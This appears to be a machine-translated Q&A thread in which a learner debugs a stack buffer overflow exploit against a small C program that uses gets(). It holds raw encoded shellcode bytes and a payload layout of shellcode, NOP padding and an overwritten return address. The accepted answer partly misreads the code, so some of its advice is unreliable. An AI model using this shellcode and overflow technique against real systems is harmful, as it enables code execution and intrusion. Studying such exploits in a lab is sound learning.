2013-07-29 79 views
0

我得到這個錯誤免疫力調試器:免疫力調試錯誤:「訪問衝突讀取時[90909090]」

訪問衝突讀取[90909090]

當我想利用一個簡單的c代碼:我給它一個重寫返回地址的長輸入,當它跳轉到新的返回地址並開始運行我的shellcode時,我得到錯誤。

這是我的C代碼:

#include <stdio.h> 

int main(int argc ,char** argv) 
{ 
    int cookie; 
    char buffer[300]; 
    printf(" buffer : %08x\r\n",&buffer); 
    gets(buffer); 
    return 0; 
} 

,這是我的shellcode:

0xbd,0xec,0xf4,0xe7,0x5a,0xdb,0xd2,0xd9,0x74,0x24,0xf4,0x58, 
0x31,0xc9,0xb1,0x32,0x31,0x68,0x12,0x03,0x68,0x12,0x83,0x2c, 
0xf0,0x05,0xaf,0x50,0x11,0x40,0x50,0xa8,0xe2,0x33,0xd8,0x4d, 
0xd3,0x61,0xbe,0x06,0x46,0xb6,0xb4,0x4a,0x6b,0x3d,0x98,0x7e, 
0xf8,0x33,0x35,0x71,0x49,0xf9,0x63,0xbc,0x4a,0xcf,0xab,0x12, 
0x88,0x51,0x50,0x68,0xdd,0xb1,0x69,0xa3,0x10,0xb3,0xae,0xd9, 
0xdb,0xe1,0x67,0x96,0x4e,0x16,0x03,0xea,0x52,0x17,0xc3,0x61, 
0xea,0x6f,0x66,0xb5,0x9f,0xc5,0x69,0xe5,0x30,0x51,0x21,0x1d, 
0x3a,0x3d,0x92,0x1c,0xef,0x5d,0xee,0x57,0x84,0x96,0x84,0x66, 
0x4c,0xe7,0x65,0x59,0xb0,0xa4,0x5b,0x56,0x3d,0xb4,0x9c,0x50, 
0xde,0xc3,0xd6,0xa3,0x63,0xd4,0x2c,0xde,0xbf,0x51,0xb1,0x78, 
0x4b,0xc1,0x11,0x79,0x98,0x94,0xd2,0x75,0x55,0xd2,0xbd,0x99, 
0x68,0x37,0xb6,0xa5,0xe1,0xb6,0x19,0x2c,0xb1,0x9c,0xbd,0x75, 
0x61,0xbc,0xe4,0xd3,0xc4,0xc1,0xf7,0xbb,0xb9,0x67,0x73,0x29, 
0xad,0x1e,0xde,0x27,0x30,0x92,0x64,0x0e,0x32,0xac,0x66,0x20, 
0x5b,0x9d,0xed,0xaf,0x1c,0x22,0x24,0x94,0xd3,0x68,0x65,0xbc, 
0x7b,0x35,0xff,0xfd,0xe1,0xc6,0xd5,0xc1,0x1f,0x45,0xdc,0xb9, 
0xdb,0x55,0x95,0xbc,0xa0,0xd1,0x45,0xcc,0xb9,0xb7,0x69,0x63, 
0xb9,0x9d,0x09,0xe2,0x29,0x7d,0xce 

殼具有224字節長度和返回地址是上偏移312,所以我的輸入具有以下格式:

shellcode+'\x90'*88+ReturnAddress 
+0

在你的shellcode中,我注意到中間第二行有一個「缺失」(,)。它應該錯過那個嗎?還是在複製/粘貼過程中丟失了?我希望你不要介意我編寫「Shell代碼」 –

+0

Oo,如果原始代碼中存在該錯誤,我懷疑它會導致問題。 –

+0

@DavidRobertsson - 據我所知,逗號被你錯誤地刪除了:http://stackoverflow.com/posts/17923253/revisions我更正了,同時批准了編輯,並做了一些更改。如果我犯了一個錯誤,請讓我知道,或提交另一個編輯。謝謝! – Kobi

回答

2

printf()說法錯誤的是在你的代碼,一個& NU牛逼需要:

printf(" buffer : %08x\r\n", &buffer); 
          ^ remove 

接下來,你char buffer[300];有垃圾值,即使你刪除&,它會導致一個未定義的行爲。

注意:正如David RF注意到您正在使用已棄用的gets()。您應該使用char * fgets (char * str, int num, FILE * stream);函數來避免緩衝區溢出攻擊。

bwt,它是第一次讀取用戶讀取之前緩衝區爲printf的程序! (爲什麼這樣?)

+0

+1,此外打印一個未初始化的緩衝區的值,必須'得到'(不推薦使用,使用'fgets'代替)打印 –

+0

好吧,感謝您的回答 – Sani

+1

@DavidRF是我失蹤的優秀點。 –